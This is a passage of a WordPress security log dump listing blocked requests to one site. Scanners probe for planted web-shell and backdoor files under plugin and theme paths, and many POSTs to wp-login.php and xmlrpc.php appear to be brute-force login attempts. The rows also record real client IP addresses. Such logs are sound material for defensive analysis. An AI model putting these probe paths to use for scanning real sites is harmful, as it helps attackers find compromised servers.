Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','8GmDh2Qx4jHi7cMqJbvCKzBn',0,1665527075.9022,515,'','GET',403,0,700,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/wp-classic/wp-classic/wp-classic.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','2l3ciZjd5MtsqDnbeCv4JFRf',0,1665527074.2141,270,'','GET',403,0,700,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/wp-roilback/includes/roilback.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','7ZDhEi0PRfv8W52GSBUmFCHl',0,1665527039.4760,279,'','GET',403,0,700,0,1,'',0),('204.48.26.148',3425704596,'','http://cteisys.com/wp-content/wp-files-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','hvtKoGy7L2XuDVZeR5PB8YE9',0,1665527020.0221,275,'','GET',403,0,700,0,1,'',0),('204.48.26.148',3425704596,'','http://cteisys.com/wp-content/wp-file-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','PqEpbcFgkXRH9VfxoMJz31wK',0,1665527015.1994,314,'','GET',403,0,700,0,1,'',0),('204.48.26.148',3425704596,'','http://cteisys.com/wp-content/wordpress-index-keyword.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','vksdac8FXUjZ6m7VegtuyxJT',0,1665527006.6988,388,'','GET',403,0,700,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','Yl09w52Kps7XfvtNAImhkGBP',0,1665526989.2553,17590,'','POST',403,0,600,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/wp-classic_editor/werdt/werd.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','hVzBEQUWRuC81nNL6wsTqbPp',0,1665526839.1738,272,'','GET',403,0,700,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/core-builder/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','Y3EvHb7FxpIwRkBUjKGeWQMa',0,1665526812.3518,537,'','GET',403,0,700,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/task-controller/index.php:petemartin.com','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','yBkglEvT3Y8th9b4URVuDKIz',0,1665526793.7189,288,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-static.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','4AIEo1bNy0wxJCFKaOD5Y3vh',0,1665524386.4099,425,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/uploads/wp-queryall.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','oYOJAzXy6FnHcU0d93bTCStv',0,1665524384.8656,804,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-queryall.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','7tlVyFDOqoBkYCAILbZaiW5N',0,1665524383.7046,375,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','MJtyshBcE1HDl3Kw7pokCnAG',0,1665524382.3037,600,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/themes/twentythree/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','cSYt2am5NxvG0BOXKJpRVr9T',0,1665524381.0147,502,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/plugins/networker/networker.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Hv5wqmF8YgLkneBC2sicZxDU',0,1665524379.9492,288,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/plugins/wp-light/wp-light.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3VhQ5yrdZYcJw2ma6S8X7Njb',0,1665524378.8487,313,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-plain.php.suspected?p=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Gig4KTmht5Yu9qoEB3axMRPQ',0,1665524371.4085,290,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-plain.php?p=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','30d8DGJILRO4yBfKWgbAzetN',0,1665524370.3474,294,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-system-opencloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','XY35aJgV2TnBxltKo8MuDqpF',0,1665524369.2897,275,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-system-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','pMQtDXb6N5Ev72qyliJ1U4uf',0,1665524368.2000,275,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-includes/wp-system-opencloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','QKpdXqW6Yrc01APxjVJiZGkD',0,1665524366.0586,278,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-shield-icon-managed.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','xM6pTDAEJuw7kefOoS9C2Lsl',0,1665524367.0969,279,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','vBM0qdAJLCgRNXQyEmhIoUnS',0,1665524364.9725,275,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-includes/wp-shield-icon-managed.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qgcj9WmxpklPZhDTLOw31s6r',0,1665524363.8412,302,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-includes/system-reboot.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','LhcVs1kTOYwNUAHx8qvMuzjg',0,1665524362.7449,278,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','M9o1bkIDK2iqCfa7JVtUpOen',0,1665524361.5929,319,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-includes/class-wordpress-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','sopKWUEg4mzQrV91AaJxhT6R',0,1665524360.5124,291,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-includes/class-detect-spam.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','V25snmW48cUCTBfALODdY0xb',0,1665524359.4113,278,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-files-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','hWv3eaFogAHUcJBMOCY2p70Q',0,1665524358.2826,309,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/wp-files-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','WXhFiB1pUjvuZlrqTxH0Ks3V',0,1665524357.1835,303,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wordpress-index-keyword.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Lz8C9kbMtlxvrA04FQRDVhf3',0,1665524356.1071,284,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/system-reboot.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ByOU9RMl1aiQIdjfVZuWXpHc',0,1665524355.0503,282,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/class-wordpress-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2IjpoMl4kyfGq16vx0KreCOz',0,1665524353.8344,324,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/class-detect-spam.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qGSYmXjIh0dQrVicknRFTuCH',0,1665524352.7318,290,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/wordpress-index-keyword.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','yV1LgFGAhJX3Q9De0487SfNv',0,1665524351.6379,295,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','4xO5NbXVFeZPcEAD1TIUlkCJ',0,1665524350.5780,281,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','BuTr4cvLwHRspUdEOh3nG7Yk',0,1665524349.4564,292,'','GET',403,0,700,0,1,'',0),('178.128.111.192',2994761664,'','https://cteisys.com/wp-content/plugins/core-engine/index.php','','{\"1\":\"Go-http-client\\/1.1\"}','GPvy5OZprVBqb18K3jATuWCN',0,1665524348.3666,292,'','GET',403,0,700,0,1,'',0),('147.182.249.22',2478242070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','YfcdSwFEZ5amohQg0xXWDVJU',0,1665523969.6783,1310,'','POST',403,0,600,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','atR4Ucfu37EHG1ogJ9sdzFAC',0,1665523900.7181,18829,'','POST',403,0,515,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','DaeTIB6CyhiA7RskSgKfuL2W',0,1665523145.9428,17757,'','POST',403,0,600,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/wp-roilbask/includes/roilbask.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','DNkc0zPnKsMCJAv1p36uI2a5',0,1665526750.2824,552,'','GET',403,0,700,0,1,'',0),('173.249.31.157',2918784925,'','http://cteisys.com/wp-content/plugins/wp-dester/dester/wp-dester.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','m5yPsclrTSAv1BkbLg2Ow80x',0,1665526750.1836,624,'','GET',403,0,700,0,1,'',0),('213.152.162.149',3583550101,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OPdoBMzDtbqgLwiVcC0pQ1RA',0,1665526685.0552,12425,'','POST',403,0,515,0,1,'',0),('213.152.187.225',3583556577,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','femWUdh3OqR2roSax0GFutHT',0,1665526679.9633,17419,'','POST',403,0,515,0,1,'',0),('46.183.216.163',783800483,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','SKEd02W8uk4DlHqzgQLJCB35',0,1665526059.1888,18289,'','POST',403,0,515,0,1,'',0),('81.70.248.169',1363605673,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','DS6jr7b2V94URzKtGLaTki5l',0,1665525843.9923,20438,'','POST',403,0,600,0,1,'',0),('2.58.47.203',37367755,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5TuBvgwQFmME6fXRLcUHjhJK',0,1665532789.6791,4954,'','POST',403,0,515,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','VP1cCeIHv97SoysAwTEKlnOB',0,1665531662.4711,1276,'','POST',403,0,600,0,1,'',0),('37.120.210.219',628675291,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3wa0cuGJimpb7n5U8BtHNrhD',0,1665531561.1203,10673,'','POST',403,0,515,0,1,'',0),('62.102.148.166',1046910118,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','WuzftFvlRMayIUXODdrx1qVE',0,1665531553.2393,18461,'','POST',403,0,515,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','JbQnLyN1eRmMdIhHSlBxA05o',0,1665530839.9878,1134,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','XKDC0lV3NxnaJYZAUmcOM5fB',0,1665530142.3561,1644,'','POST',403,0,600,0,1,'',0),('121.42.231.47',2032854831,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','83Le29SqdRvfQ7zC1yOkAblp',0,1665529696.0132,18410,'','POST',403,0,600,0,1,'',0),('159.69.8.8',2672101384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','60J9CF2xYL8MDonrGZf3p1TK',0,1665533975.5736,558,'','POST',403,0,600,0,1,'',0),('213.152.161.85',3583549781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0eqRm7dPGLKFhz5UtMk9Cnas',0,1665533538.5893,735,'','POST',403,0,515,0,1,'',0),('138.68.84.97',2319733857,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','9xVtgwMiDe1Sua8E7OPnhNzG',0,1665533528.4608,1497,'','POST',403,0,600,0,1,'',0),('213.152.161.85',3583549781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','UfL2MdZTVsb40qe8nkavPzEw',0,1665533468.5013,18919,'','POST',403,0,515,0,1,'',0),('217.151.98.168',3650577064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NFuvG2s3apml7kRHDjo0C1Le',0,1665532836.8875,1999,'','POST',403,0,515,0,1,'',0),('46.105.29.21',778640661,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','L2PXxRZCuE8id9klYIzJVvsr',0,1665539367.7723,17086,'','POST',403,0,600,0,1,'',0),('109.168.97.89',1839751513,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','AQB6xvezs8d5Tpi3ZhuFILrw',0,1665537826.0053,17512,'','POST',403,0,600,0,1,'',0),('185.190.142.217',3116273369,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','sXUOJZ6j9hco1YQiEGMACzbF',0,1665537376.1903,17408,'','POST',403,0,600,0,1,'',0),('77.65.212.122',1296159866,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','OTe6QEHYsZLCWBJcMNvnbyDz',0,1665547179.1813,17493,'','POST',403,0,600,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','3FeAkU7ndIGQfr6wz4D02alb',0,1665546337.7801,14427,'','POST',403,0,600,0,1,'',0),('199.249.230.22',3355043350,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ymO8TQDwjuKE6lt3nFMhkPUb',0,1665546188.3672,18658,'','POST',403,0,515,0,1,'',0),('20.160.233.181',346089909,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','QZSVxPLWhavNu7EmgKe0wjCA',0,1665545573.7861,390,'','GET',403,0,700,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','c2Oa8wAk9HEmqI4YeXxhU7uW',0,1665545181.0146,17494,'','POST',403,0,600,0,1,'',0),('20.160.233.181',346089909,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','OjCZ6btAy0NJHEMU74aFdBY2',0,1665545554.2589,11752,'','GET',403,0,700,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZL5QIF74AP9VOBHW3yUsN1gl',0,1665554325.2263,19153,'','POST',403,0,515,0,1,'',0),('143.110.137.82',2406386002,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','efNGoMZ1745VlwLKuDsvJ0Qm',0,1665553893.3829,19234,'','POST',403,0,515,0,1,'',0),('148.72.214.59',2487801403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ABW7HrnjshwX0uD6QKICG8dF',0,1665553459.2434,2418,'','POST',403,0,515,0,1,'',0),('162.241.174.216',2733747928,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ghlfOIwy4602bjrSsHNn7ktE',0,1665550640.1821,2232,'','POST',403,0,515,0,1,'',0),('213.152.162.79',3583550031,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BNTHIUWqOtxAPnXiJ25o3lw9',0,1665549554.2657,1554,'','POST',403,0,515,0,1,'',0),('77.39.212.31',1294455839,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','uQ2ysKOhia3Fp1IJXeVEfAW4',0,1665549524.0617,17381,'','POST',403,0,600,0,1,'',0),('46.105.29.21',778640661,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','eA6Mm1liq52IEzD4xySRVNHh',0,1665549073.8278,485,'','POST',403,0,600,0,1,'',0),('162.0.216.181',2717964469,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WyB0Tqzr4GnwAIN2FU9ZYtxX',0,1665549032.8741,19230,'','POST',403,0,515,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LJqnfByrspejzlMWcDK5Vboa',0,1665547200.3429,2311,'','POST',403,0,515,0,1,'',0),('209.141.47.94',3515690846,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','E7qi3XS2KVmhazFAcdj8ketZ',0,1665548264.4674,592,'','POST',403,0,600,0,1,'',0),('157.245.246.208',2650142416,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','3XSqUleYixIzB1Lac8HM6Ktm',0,1665553379.3973,17832,'','POST',403,0,600,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 